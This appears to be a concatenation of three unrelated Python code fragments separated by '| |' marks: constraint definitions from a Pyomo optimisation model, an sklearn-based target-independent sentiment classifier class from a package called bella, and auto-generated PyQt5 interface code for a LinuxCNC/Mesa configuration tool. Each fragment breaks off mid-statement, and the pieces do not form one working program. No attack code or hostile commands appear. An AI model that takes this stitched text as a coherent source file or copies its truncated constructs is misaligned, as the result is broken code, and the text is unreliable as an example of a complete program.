+ m.x1160 + m.x1248 + m.x1300 + m.x1342 + m.x1384 + m.x1426 + m.x1468 + m.x1508 + m.x1545
+ m.x1614 == 1)
m.c1914 = Constraint(expr= m.x76 + m.x209 + m.x339 + m.x546 + m.x607 + m.x641 + m.x683 + m.x734 + m.x783 + m.x896
+ m.x950 + m.x989 + m.x1161 + m.x1301 + m.x1343 + m.x1385 + m.x1427 + m.x1469 + m.x1509
+ m.x1615 == 1)
m.c1915 = Constraint(expr= m.x77 + m.x210 + m.x340 + m.x547 + m.x608 + m.x642 + m.x684 + m.x735 + m.x784 + m.x897
+ m.x951 + m.x990 + m.x1302 + m.x1344 + m.x1386 + m.x1428 + m.x1470 + m.x1510 + m.x1616 == 1)
m.c1916 = Constraint(expr= m.x211 + m.x341 + m.x491 + m.x548 + m.x609 + m.x643 + m.x685 + m.x736 + m.x785 + m.x865
+ m.x898 + m.x952 + m.x991 + m.x1111 + m.x1162 + m.x1249 + m.x1303 + m.x1345 + m.x1387
+ m.x1429 + m.x1471 + m.x1617 == 1)
m.c1917 = Constraint(expr= m.x342 + m.x492 + m.x549 + m.x610 + m.x686 + m.x737 + m.x786 + m.x866 + m.x899 + m.x953
+ m.x992 + m.x1112 + m.x1163 + m.x1250 + m.x1304 + m.x1346 + m.x1388 + m.x1430 + m.x1472
+ m.x1576 + m.x1618 == 1)
m.c1918 = Constraint(expr= m.x286 + m.x310 + m.x343 + m.x369 + m.x389 + m.x493 + m.x550 + m.x611 + m.x687 + m.x738
+ m.x787 + m.x828 + m.x900 + m.x993 + m.x1021 + m.x1113 + m.x1164 + m.x1195 + m.x1251
+ m.x1305 + m.x1347 + m.x1389 + m.x1431 + m.x1473 + m.x1511 + m.x1546 + m.x1577 + m.x1619
== 1)
m.c1919 = Constraint(expr= m.x390 + m.x494 + m.x551 + m.x612 + m.x688 + m.x739 + m.x788 + m.x829 + m.x851 + m.x867
+ m.x901 + m.x954 + m.x994 + m.x1022 + m.x1053 + m.x1114 + m.x1165 + m.x1196 + m.x1214
+ m.x1252 + m.x1306 + m.x1348 + m.x1390 + m.x1432 + m.x1474 + m.x1512 + m.x1578 + m.x1620
== 1)
m.c1920 = Constraint(expr= m.x495 + m.x613 + m.x740 + m.x830 + m.x852 + m.x955 + m.x995 + m.x1115 + m.x1166 + m.x1253
+ m.x1621 == 1)
m.c1921 = Constraint(expr= m.x56 + m.x118 + m.x146 + m.x163 + m.x180 + m.x228 + m.x252 + m.x287 + m.x344 + m.x391
+ m.x411 + m.x496 + m.x552 + m.x614 + m.x741 + m.x789 + m.x831 + m.x902 + m.x956 + m.x996
+ m.x1023 + m.x1116 + m.x1167 + m.x1254 + m.x1307 + m.x1349 + m.x1391 + m.x1433 + m.x1475
+ m.x1513 + m.x1547 + m.x1579 + m.x1622 == 1)
m.c1922 = Constraint(expr= m.x288 + m.x392 + m.x412 + m.x497 + m.x553 + m.x615 + m.x689 + m.x742 + m.x790 + m.x832
+ m.x853 + m.x903 + m.x957 + m.x997 + m.x1024 + m.x1117 + m.x1168 + m.x1197 + m.x1215
+ m.x1255 + m.x1308 + m.x1350 + m.x1392 + m.x1434 + m.x1476 + m.x1514 + m.x1548 + m.x1580
+ m.x1623 == 1)
m.c1923 = Constraint(expr= m.x289 + m.x393 + m.x498 + m.x554 + m.x616 + m.x743 + m.x791 + m.x833 + m.x904 + m.x998
+ m.x1025 + m.x1118 + m.x1169 + m.x1198 + m.x1216 + m.x1256 + m.x1309 + m.x1351 | |
'''
Contains classes of models that can be found in `Vo and Zhang 2015 paper \
<https://www.ijcai.org/Proceedings/15/Papers/194.pdf>`_.
Classes:
1. :py:class:`bella.models.target.TargetInd` - Target indepdent model
'''
from collections import defaultdict
import copy
import time
import pandas as pd
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import FeatureUnion
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import accuracy_score
from sklearn.externals import joblib
from bella.tokenisers import ark_twokenize
from bella.neural_pooling import matrix_max, matrix_min, matrix_avg,\
matrix_median, matrix_prod, matrix_std
from bella.notebook_helper import get_json_data, write_json_data
from bella.scikit_features.context import Context
from bella.scikit_features.tokeniser import ContextTokeniser
from bella.scikit_features.word_vector import ContextWordVectors
from bella.scikit_features.lexicon_filter import LexiconFilter
from bella.scikit_features.neural_pooling import NeuralPooling
from bella.scikit_features.join_context_vectors import JoinContextVectors
class TargetInd():
def __init__(self):
self.model = None
self.pipeline = Pipeline([
('contexts', Context('full')),
('tokens', ContextTokeniser(ark_twokenize, True)),
('word_vectors', ContextWordVectors()),
('pool_funcs', FeatureUnion([
('max_pipe', Pipeline([
('max', NeuralPooling(matrix_max)),
('join', JoinContextVectors(matrix_median))
])),
('min_pipe', Pipeline([
('min', NeuralPooling(matrix_min)),
('join', JoinContextVectors(matrix_median))
])),
('avg_pipe', Pipeline([
('avg', NeuralPooling(matrix_avg)),
('join', JoinContextVectors(matrix_median))
])),
('prod_pipe', Pipeline([
('min', NeuralPooling(matrix_prod)),
('join', JoinContextVectors(matrix_median))
])),
('std_pipe', Pipeline([
('min', NeuralPooling(matrix_std)),
('join', JoinContextVectors(matrix_median))
]))
])),
('scale', MinMaxScaler()),
('svm', LinearSVC(C=0.01))
])
def save_model(self, model_file, verbose=0):
if self.model is None:
raise ValueError('Model is not fitted please fit the model '\
'using the fit function')
time_taken = time.time()
joblib.dump(self.model, model_file)
if verbose == 1:
time_taken = round(time.time() - time_taken, 2)
print('Model saved to {}. Save time {}'\
.format(model_file, time_taken))
def load_model(self, model_file, verbose=0):
if verbose == 1:
time_taken = time.time()
print('Loading model from {}'.format(model_file))
self.model = joblib.load(model_file)
time_taken = round(time.time() - time_taken, 2)
print('Model successfully loaded. Load time {}'.format(time_taken))
else:
self.model = joblib.load(model_file)
def find_best_c(self, train_data, train_y, grid_params, save_file=None,
dataset_name=None, re_write=False, **kwargs):
'''
:param train_data: Training instances to grid search over
:param train_y: Training True values to grid search over
:param grid_params: parameters for the model, all parameters can be \
found from the `get_cv_params` function. The C value parameter will be \
ignored if given.
:param kwargs: keywords arguments to give as arguments to the scikit learn \
`GridSearchCV <http://scikit-learn.org/stable/modules/generated/sklearn.\
model_selection.GridSearchCV.html>`_ object e.g. cv=10.
:type train_data: array/list
:type train_y: array/list
:type grid_params: dict
:type kwargs: dict
:returns: Searches through two sets of C values a coarse grain values \
then a fine grain. Grid searches over these values to return the best \
C value without doing a full exhaustive search. This method inspired by \
`Hsu et al. SVM guide \
<https://www.csie.ntu.edu.tw/~cjlin/papers/guide/guide.pdf>`_
:rtype: float
'''
def best_c_value(c_scores):
best = 0
best_c = 0
for c_value, acc in c_scores.items():
if acc > best:
best_c = c_value
best = acc
return float(best_c)
def grid_res_to_dict(grid_results):
c_score = {}
c_scores = grid_results[['param_svm__C', 'mean_test_score']]
for i in c_scores.index:
c_result = c_scores.loc[i]
c_value = c_result['param_svm__C']
test_score = c_result['mean_test_score']
c_score[c_value] = test_score
return c_score
save_file_given = save_file is not None and dataset_name is not None
# If C value given in grid_params remove it
if 'C' in grid_params:
del grid_params['C']
if save_file_given and not re_write:
c_scores = get_json_data(save_file, dataset_name)
if c_scores != {}:
return best_c_value(c_scores), c_scores
# Coarse grain search
coarse_range = []
start = 0.00001
stop = 10
while True:
coarse_range.append(start)
start *= 10
if start > stop:
break
grid_params['C'] = coarse_range
cv_params = self.get_cv_params(**grid_params)
c_scores = {}
coarse_results = self.grid_search(train_data, train_y,
params=cv_params, **kwargs)
c_scores = {**grid_res_to_dict(coarse_results), **c_scores}
best_coarse_c = self.model.best_params_['svm__C']
# Fine grain search
fine_range = [(best_coarse_c / 10) * 3.5,
(best_coarse_c / 10) * 7, best_coarse_c,
best_coarse_c * 3.5, best_coarse_c * 7]
grid_params['C'] = fine_range
cv_params = self.get_cv_params(**grid_params)
fine_results = self.grid_search(train_data, train_y,
params=cv_params, **kwargs)
c_scores = {**grid_res_to_dict(fine_results), **c_scores}
best_c = self.model.best_params_['svm__C']
c_2_string = self.c_param_name(c_scores.keys())
c_scores = {c_2_string[c] : value for c, value in c_scores.items()}
if save_file_given:
write_json_data(save_file, dataset_name, c_scores)
return best_c, c_scores
def c_param_name(self, c_values):
'''
:param c_values: A list of floats representing C values to be mapped to \
String values
:type c_values: list
:returns: A dict of float to String values where the float represents \
the true C value and the String is it's String representation.
:rtype: dict
'''
return {c_value : str(c_value) for c_value in c_values}
def senti_lexicon_param_name(self, senti_lexicons):
'''
:param all_word_vectors: A list of Lexicon instances
:type word_vectors: list
:returns: A dict mapping Lexicon instance with the String name of the \
lexicon
:rtype: dict
'''
return {senti_lexicon : senti_lexicon.name \
for senti_lexicon in senti_lexicons}
def word_vector_param_name(self, all_word_vectors):
'''
:param all_word_vectors: A list of a list of WordVector instances
:type word_vectors: list
:returns: A dict of tuples containing WordVector instances and there \
String representation found using their name attribute.
:rtype: dict
'''
word_vector_2_name = {}
for word_vectors in all_word_vectors:
word_vectors_tuple = tuple(word_vectors)
word_vectors_name = [word_vector.name for word_vector in word_vectors]
word_vectors_name = ' '.join(word_vectors_name)
word_vector_2_name[word_vectors_tuple] = word_vectors_name
return word_vector_2_name
def tokeniser_param_name(self, tokenisers):
'''
:param tokenisers: A list of tokeniser functions
:type tokenisers: list
:returns: A dict of tokeniser function to the name of the tokeniser \
function as a String
:rtype: dict
'''
return {tokeniser : tokeniser.__name__ for tokeniser in tokenisers}
def param_name_function(self, param_name):
'''
:param param_name: Name of the only parameter being searched for in \
the grid search
:type param_name: String
:returns: A function that can map the parameter values of the parameter \
name to meaningful String values
:rtype: function
'''
if param_name == 'word_vectors':
return self.word_vector_param_name
elif param_name == 'tokenisers':
return self.tokeniser_param_name
elif param_name == 'C':
return self.c_param_name
elif param_name == 'senti_lexicons':
return self.senti_lexicon_param_name
elif param_name == 'parsers':
return self.tokeniser_param_name
else:
raise ValueError('param_name has to be on of the following values:'\
'word_vectors, tokenisers or C not {}'\
.format(param_name))
@staticmethod
def _get_word_vector_names():
'''
Method to be overidden by subclasses as each pipeline will be different
and will have different parameter names for where the word vectors are
set.
:returns: A list of of parameter names where the word vectors are set in \
the pipeline.
:rtype: list
'''
return ['word_vectors__vectors']
@staticmethod
def _get_tokeniser_names():
'''
Method to be overidden by subclasses as each pipeline will be different
and will have different parameter names for where the tokenisers are
set.
:returns: A list of of parameter names where the tokenisers are set in \
the pipeline.
:rtype: list
'''
return ['tokens']
@staticmethod
def _add_to_params_dict(params_dict, keys, value):
'''
Given a dictionary it adds the value to each key in the list of keys
into the dictionary. Returns the updated dictionary.
:param params_dict: Dictionary to be updated
:param keys: list of keys
:param value: value to be added to each key in the list of keys.
:type params_dict: dict
:type keys: list
:type value: Python object
:returns: The dictionary updated
:rtype: dict
'''
if not isinstance(keys, list):
raise ValueError('The keys parameter has to be of type list and not {}'\
.format(type(keys)))
for key in keys:
params_dict[key] = value
return params_dict
def get_params(self, word_vector, tokeniser=None, lower=None, C=None,
random_state=None, scale=True):
'''
This method is to be overidden when more values than those listed in the
attributes are required for the model. E.g. a lexicon.
If values are not required e.g. lower then the model has a defualt value
for it which will be used when the user does not set a value here.
:param word_vector: A list of `bella.word_vectors.WordVectors` \
instances e.g. [WordVectors(), AnotherWordVector()]
:param tokeniser: A tokeniser method from `bella.tokenisers` \
or a method that conforms to the same output as `bella.tokenisers`
:param lower: A bool which indicate wether to lower case the input words.
:param C: A float which indicates the C value of the SVM classifier.
:param random_state: A int which defines the random number to generate \
to shuffle the data. Used to ensure reproducability.
:param scale: bool indicating to use scaling or not. Default is to scale.
:type word_vector: list
:type tokeniser: function
:type lower: bool
:type C: float
:type random_state: int
:type scale: bool Default True
:return: A parameter dict which indicates the parameters the model should \
use. The return of this function can be used as the params attribute in \
the `fit` method.
:rtype: dict
'''
params_dict = {}
params_dict = self._add_to_params_dict(params_dict,
self._get_word_vector_names(),
word_vector)
if tokeniser is not None:
tokenisers_names = [param_name + '__tokeniser'
for param_name in self._get_tokeniser_names()]
params_dict = self._add_to_params_dict(params_dict, tokenisers_names,
tokeniser)
if | |
self.ss7i87in_5.setObjectName("ss7i87in_5")
self.gridLayout_100.addWidget(self.ss7i87in_5, 5, 1, 1, 1)
self.ss7i87in_6 = QtWidgets.QPushButton(self.groupBox_55)
self.ss7i87in_6.setObjectName("ss7i87in_6")
self.gridLayout_100.addWidget(self.ss7i87in_6, 6, 1, 1, 1)
self.ss7i87in_7 = QtWidgets.QPushButton(self.groupBox_55)
self.ss7i87in_7.setObjectName("ss7i87in_7")
self.gridLayout_100.addWidget(self.ss7i87in_7, 7, 1, 1, 1)
self.gridLayout_102.addWidget(self.groupBox_55, 0, 0, 1, 1)
spacerItem12 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_102.addItem(spacerItem12, 1, 0, 1, 1)
self.gridLayout_79.addWidget(self.groupBox_38, 0, 0, 1, 1)
self.smartSerialSW.addWidget(self.ss7i87)
self.gridLayout_59.addWidget(self.smartSerialSW, 1, 0, 1, 1)
self.tabWidget.addTab(self.tab_2, "")
self.options = QtWidgets.QWidget()
self.options.setObjectName("options")
self.manualToolChangeCB = QtWidgets.QCheckBox(self.options)
self.manualToolChangeCB.setGeometry(QtCore.QRect(20, 30, 351, 21))
self.manualToolChangeCB.setObjectName("manualToolChangeCB")
self.debugCB = QtWidgets.QComboBox(self.options)
self.debugCB.setGeometry(QtCore.QRect(468, 30, 241, 23))
self.debugCB.setObjectName("debugCB")
self.label_107 = QtWidgets.QLabel(self.options)
self.label_107.setGeometry(QtCore.QRect(470, 10, 101, 16))
self.label_107.setObjectName("label_107")
self.servoPeriodSB = QtWidgets.QSpinBox(self.options)
self.servoPeriodSB.setGeometry(QtCore.QRect(480, 110, 121, 24))
self.servoPeriodSB.setMaximum(2500000)
self.servoPeriodSB.setSingleStep(1000)
self.servoPeriodSB.setProperty("value", 1000000)
self.servoPeriodSB.setObjectName("servoPeriodSB")
self.label_211 = QtWidgets.QLabel(self.options)
self.label_211.setGeometry(QtCore.QRect(480, 80, 161, 16))
self.label_211.setObjectName("label_211")
self.groupBox_6 = QtWidgets.QGroupBox(self.options)
self.groupBox_6.setGeometry(QtCore.QRect(60, 210, 191, 151))
self.groupBox_6.setObjectName("groupBox_6")
self.gridLayout_51 = QtWidgets.QGridLayout(self.groupBox_6)
self.gridLayout_51.setContentsMargins(8, 15, 8, 8)
self.gridLayout_51.setSpacing(5)
self.gridLayout_51.setObjectName("gridLayout_51")
self.shutdownCB = QtWidgets.QCheckBox(self.groupBox_6)
self.shutdownCB.setObjectName("shutdownCB")
self.gridLayout_51.addWidget(self.shutdownCB, 3, 0, 1, 1)
self.customhalCB = QtWidgets.QCheckBox(self.groupBox_6)
self.customhalCB.setObjectName("customhalCB")
self.gridLayout_51.addWidget(self.customhalCB, 1, 0, 1, 1)
self.postguiCB = QtWidgets.QCheckBox(self.groupBox_6)
self.postguiCB.setObjectName("postguiCB")
self.gridLayout_51.addWidget(self.postguiCB, 2, 0, 1, 1)
self.haluiCB = QtWidgets.QCheckBox(self.groupBox_6)
self.haluiCB.setObjectName("haluiCB")
self.gridLayout_51.addWidget(self.haluiCB, 4, 0, 1, 1)
self.groupBox_10 = QtWidgets.QGroupBox(self.options)
self.groupBox_10.setGeometry(QtCore.QRect(60, 400, 164, 86))
self.groupBox_10.setObjectName("groupBox_10")
self.gridLayout_53 = QtWidgets.QGridLayout(self.groupBox_10)
self.gridLayout_53.setContentsMargins(8, 15, 8, 8)
self.gridLayout_53.setSpacing(5)
self.gridLayout_53.setObjectName("gridLayout_53")
self.pyvcpCB = QtWidgets.QCheckBox(self.groupBox_10)
self.pyvcpCB.setObjectName("pyvcpCB")
self.gridLayout_53.addWidget(self.pyvcpCB, 0, 0, 1, 1)
self.gladevcpCB = QtWidgets.QCheckBox(self.groupBox_10)
self.gladevcpCB.setObjectName("gladevcpCB")
self.gridLayout_53.addWidget(self.gladevcpCB, 1, 0, 1, 1)
self.label_359 = QtWidgets.QLabel(self.options)
self.label_359.setGeometry(QtCore.QRect(480, 140, 381, 20))
self.label_359.setObjectName("label_359")
self.groupBox_14 = QtWidgets.QGroupBox(self.options)
self.groupBox_14.setGeometry(QtCore.QRect(530, 280, 231, 111))
self.groupBox_14.setObjectName("groupBox_14")
self.gridLayout_56 = QtWidgets.QGridLayout(self.groupBox_14)
self.gridLayout_56.setContentsMargins(8, 8, 8, 8)
self.gridLayout_56.setSpacing(5)
self.gridLayout_56.setObjectName("gridLayout_56")
self.splashScreenSB = QtWidgets.QSpinBox(self.groupBox_14)
self.splashScreenSB.setObjectName("splashScreenSB")
self.gridLayout_56.addWidget(self.splashScreenSB, 1, 1, 1, 1)
self.label_360 = QtWidgets.QLabel(self.groupBox_14)
self.label_360.setObjectName("label_360")
self.gridLayout_56.addWidget(self.label_360, 1, 0, 1, 1)
self.label_361 = QtWidgets.QLabel(self.groupBox_14)
self.label_361.setObjectName("label_361")
self.gridLayout_56.addWidget(self.label_361, 0, 0, 1, 1)
self.introGraphicLE = QtWidgets.QLineEdit(self.groupBox_14)
self.introGraphicLE.setObjectName("introGraphicLE")
self.gridLayout_56.addWidget(self.introGraphicLE, 0, 1, 1, 1)
self.label_358 = QtWidgets.QLabel(self.groupBox_14)
self.label_358.setAlignment(QtCore.Qt.AlignCenter)
self.label_358.setObjectName("label_358")
self.gridLayout_56.addWidget(self.label_358, 2, 0, 1, 2)
self.groupBox1 = QtWidgets.QGroupBox(self.options)
self.groupBox1.setGeometry(QtCore.QRect(60, 100, 166, 53))
self.groupBox1.setObjectName("groupBox1")
self.gridLayout_50 = QtWidgets.QGridLayout(self.groupBox1)
self.gridLayout_50.setContentsMargins(8, 8, 8, 8)
self.gridLayout_50.setSpacing(5)
self.gridLayout_50.setObjectName("gridLayout_50")
self.noforcehomingCB = QtWidgets.QCheckBox(self.groupBox1)
self.noforcehomingCB.setObjectName("noforcehomingCB")
self.gridLayout_50.addWidget(self.noforcehomingCB, 0, 0, 1, 1)
self.tabWidget.addTab(self.options, "")
self.plc = QtWidgets.QWidget()
self.plc.setObjectName("plc")
self.ladderGB = QtWidgets.QGroupBox(self.plc)
self.ladderGB.setGeometry(QtCore.QRect(40, 30, 271, 451))
self.ladderGB.setCheckable(True)
self.ladderGB.setChecked(False)
self.ladderGB.setObjectName("ladderGB")
self.gridLayout_28 = QtWidgets.QGridLayout(self.ladderGB)
self.gridLayout_28.setContentsMargins(8, 8, 8, 8)
self.gridLayout_28.setSpacing(5)
self.gridLayout_28.setObjectName("gridLayout_28")
self.label_155 = QtWidgets.QLabel(self.ladderGB)
self.label_155.setObjectName("label_155")
self.gridLayout_28.addWidget(self.label_155, 2, 2, 1, 1)
self.label_143 = QtWidgets.QLabel(self.ladderGB)
self.label_143.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_143.setObjectName("label_143")
self.gridLayout_28.addWidget(self.label_143, 1, 0, 1, 1)
self.label_147 = QtWidgets.QLabel(self.ladderGB)
self.label_147.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_147.setObjectName("label_147")
self.gridLayout_28.addWidget(self.label_147, 6, 0, 1, 1)
self.ladderWordsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderWordsSB.setObjectName("ladderWordsSB")
self.gridLayout_28.addWidget(self.ladderWordsSB, 3, 1, 1, 1)
self.label_153 = QtWidgets.QLabel(self.ladderGB)
self.label_153.setObjectName("label_153")
self.gridLayout_28.addWidget(self.label_153, 1, 2, 1, 1)
self.label_148 = QtWidgets.QLabel(self.ladderGB)
self.label_148.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_148.setObjectName("label_148")
self.gridLayout_28.addWidget(self.label_148, 8, 0, 1, 1)
self.ladderTimersSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderTimersSB.setObjectName("ladderTimersSB")
self.gridLayout_28.addWidget(self.ladderTimersSB, 4, 1, 1, 1)
self.ladderRungsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderRungsSB.setMaximum(200)
self.ladderRungsSB.setObjectName("ladderRungsSB")
self.gridLayout_28.addWidget(self.ladderRungsSB, 1, 1, 1, 1)
self.label_146 = QtWidgets.QLabel(self.ladderGB)
self.label_146.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_146.setObjectName("label_146")
self.gridLayout_28.addWidget(self.label_146, 4, 0, 1, 1)
self.ladderInputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderInputsSB.setObjectName("ladderInputsSB")
self.gridLayout_28.addWidget(self.ladderInputsSB, 8, 1, 1, 1)
self.label_154 = QtWidgets.QLabel(self.ladderGB)
self.label_154.setObjectName("label_154")
self.gridLayout_28.addWidget(self.label_154, 0, 2, 1, 1)
self.label_157 = QtWidgets.QLabel(self.ladderGB)
self.label_157.setObjectName("label_157")
self.gridLayout_28.addWidget(self.label_157, 4, 2, 1, 1)
self.iecTimerSB = QtWidgets.QSpinBox(self.ladderGB)
self.iecTimerSB.setObjectName("iecTimerSB")
self.gridLayout_28.addWidget(self.iecTimerSB, 5, 1, 1, 1)
self.label_149 = QtWidgets.QLabel(self.ladderGB)
self.label_149.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_149.setObjectName("label_149")
self.gridLayout_28.addWidget(self.label_149, 9, 0, 1, 1)
self.label_144 = QtWidgets.QLabel(self.ladderGB)
self.label_144.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_144.setObjectName("label_144")
self.gridLayout_28.addWidget(self.label_144, 2, 0, 1, 1)
self.ladderOutputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderOutputsSB.setObjectName("ladderOutputsSB")
self.gridLayout_28.addWidget(self.ladderOutputsSB, 9, 1, 1, 1)
self.label_159 = QtWidgets.QLabel(self.ladderGB)
self.label_159.setObjectName("label_159")
self.gridLayout_28.addWidget(self.label_159, 5, 2, 1, 1)
self.ladderSectionsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderSectionsSB.setObjectName("ladderSectionsSB")
self.gridLayout_28.addWidget(self.ladderSectionsSB, 11, 1, 1, 1)
self.label_165 = QtWidgets.QLabel(self.ladderGB)
self.label_165.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_165.setObjectName("label_165")
self.gridLayout_28.addWidget(self.label_165, 7, 0, 1, 1)
self.label_166 = QtWidgets.QLabel(self.ladderGB)
self.label_166.setObjectName("label_166")
self.gridLayout_28.addWidget(self.label_166, 7, 2, 1, 1)
self.label_151 = QtWidgets.QLabel(self.ladderGB)
self.label_151.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_151.setObjectName("label_151")
self.gridLayout_28.addWidget(self.label_151, 11, 0, 1, 1)
self.label_145 = QtWidgets.QLabel(self.ladderGB)
self.label_145.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_145.setObjectName("label_145")
self.gridLayout_28.addWidget(self.label_145, 3, 0, 1, 1)
self.ladderExpresionsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderExpresionsSB.setObjectName("ladderExpresionsSB")
self.gridLayout_28.addWidget(self.ladderExpresionsSB, 10, 1, 1, 1)
self.label_161 = QtWidgets.QLabel(self.ladderGB)
self.label_161.setObjectName("label_161")
self.gridLayout_28.addWidget(self.label_161, 8, 2, 1, 1)
self.label_160 = QtWidgets.QLabel(self.ladderGB)
self.label_160.setObjectName("label_160")
self.gridLayout_28.addWidget(self.label_160, 6, 2, 1, 1)
self.ladderBitsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderBitsSB.setObjectName("ladderBitsSB")
self.gridLayout_28.addWidget(self.ladderBitsSB, 2, 1, 1, 1)
self.ladderMonostablesSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderMonostablesSB.setObjectName("ladderMonostablesSB")
self.gridLayout_28.addWidget(self.ladderMonostablesSB, 6, 1, 1, 1)
self.label_150 = QtWidgets.QLabel(self.ladderGB)
self.label_150.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_150.setObjectName("label_150")
self.gridLayout_28.addWidget(self.label_150, 10, 0, 1, 1)
self.label_163 = QtWidgets.QLabel(self.ladderGB)
self.label_163.setObjectName("label_163")
self.gridLayout_28.addWidget(self.label_163, 10, 2, 1, 1)
self.label_162 = QtWidgets.QLabel(self.ladderGB)
self.label_162.setObjectName("label_162")
self.gridLayout_28.addWidget(self.label_162, 9, 2, 1, 1)
self.ladderCountersSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderCountersSB.setObjectName("ladderCountersSB")
self.gridLayout_28.addWidget(self.ladderCountersSB, 7, 1, 1, 1)
self.label_164 = QtWidgets.QLabel(self.ladderGB)
self.label_164.setObjectName("label_164")
self.gridLayout_28.addWidget(self.label_164, 11, 2, 1, 1)
self.label_168 = QtWidgets.QLabel(self.ladderGB)
self.label_168.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_168.setObjectName("label_168")
self.gridLayout_28.addWidget(self.label_168, 13, 0, 1, 1)
self.label_170 = QtWidgets.QLabel(self.ladderGB)
self.label_170.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_170.setObjectName("label_170")
self.gridLayout_28.addWidget(self.label_170, 15, 0, 1, 1)
self.label_158 = QtWidgets.QLabel(self.ladderGB)
self.label_158.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_158.setObjectName("label_158")
self.gridLayout_28.addWidget(self.label_158, 5, 0, 1, 1)
self.label_156 = QtWidgets.QLabel(self.ladderGB)
self.label_156.setObjectName("label_156")
self.gridLayout_28.addWidget(self.label_156, 3, 2, 1, 1)
self.label_167 = QtWidgets.QLabel(self.ladderGB)
self.label_167.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_167.setObjectName("label_167")
self.gridLayout_28.addWidget(self.label_167, 12, 0, 1, 1)
self.label_169 = QtWidgets.QLabel(self.ladderGB)
self.label_169.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_169.setObjectName("label_169")
self.gridLayout_28.addWidget(self.label_169, 14, 0, 1, 1)
self.label_171 = QtWidgets.QLabel(self.ladderGB)
self.label_171.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_171.setObjectName("label_171")
self.gridLayout_28.addWidget(self.label_171, 16, 0, 1, 1)
self.ladderSymbolsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderSymbolsSB.setObjectName("ladderSymbolsSB")
self.gridLayout_28.addWidget(self.ladderSymbolsSB, 12, 1, 1, 1)
self.ladderS32InputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderS32InputsSB.setObjectName("ladderS32InputsSB")
self.gridLayout_28.addWidget(self.ladderS32InputsSB, 13, 1, 1, 1)
self.ladderS32OuputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderS32OuputsSB.setObjectName("ladderS32OuputsSB")
self.gridLayout_28.addWidget(self.ladderS32OuputsSB, 14, 1, 1, 1)
self.ladderFloatInputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderFloatInputsSB.setObjectName("ladderFloatInputsSB")
self.gridLayout_28.addWidget(self.ladderFloatInputsSB, 15, 1, 1, 1)
self.ladderFloatOutputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderFloatOutputsSB.setObjectName("ladderFloatOutputsSB")
self.gridLayout_28.addWidget(self.ladderFloatOutputsSB, 16, 1, 1, 1)
self.label_172 = QtWidgets.QLabel(self.ladderGB)
self.label_172.setObjectName("label_172")
self.gridLayout_28.addWidget(self.label_172, 12, 2, 1, 1)
self.label_173 = QtWidgets.QLabel(self.ladderGB)
self.label_173.setObjectName("label_173")
self.gridLayout_28.addWidget(self.label_173, 13, 2, 1, 1)
self.label_174 = QtWidgets.QLabel(self.ladderGB)
self.label_174.setObjectName("label_174")
self.gridLayout_28.addWidget(self.label_174, 14, 2, 1, 1)
self.label_175 = QtWidgets.QLabel(self.ladderGB)
self.label_175.setObjectName("label_175")
self.gridLayout_28.addWidget(self.label_175, 15, 2, 1, 1)
self.label_176 = QtWidgets.QLabel(self.ladderGB)
self.label_176.setObjectName("label_176")
self.gridLayout_28.addWidget(self.label_176, 16, 2, 1, 1)
self.label_177 = QtWidgets.QLabel(self.ladderGB)
self.label_177.setObjectName("label_177")
self.gridLayout_28.addWidget(self.label_177, 0, 0, 1, 1)
self.label_152 = QtWidgets.QLabel(self.plc)
self.label_152.setGeometry(QtCore.QRect(30, 490, 261, 16))
self.label_152.setObjectName("label_152")
self.tabWidget.addTab(self.plc, "")
self.pins = QtWidgets.QWidget()
self.pins.setObjectName("pins")
self.gridLayout_48 = QtWidgets.QGridLayout(self.pins)
self.gridLayout_48.setContentsMargins(8, 8, 8, 8)
self.gridLayout_48.setSpacing(5)
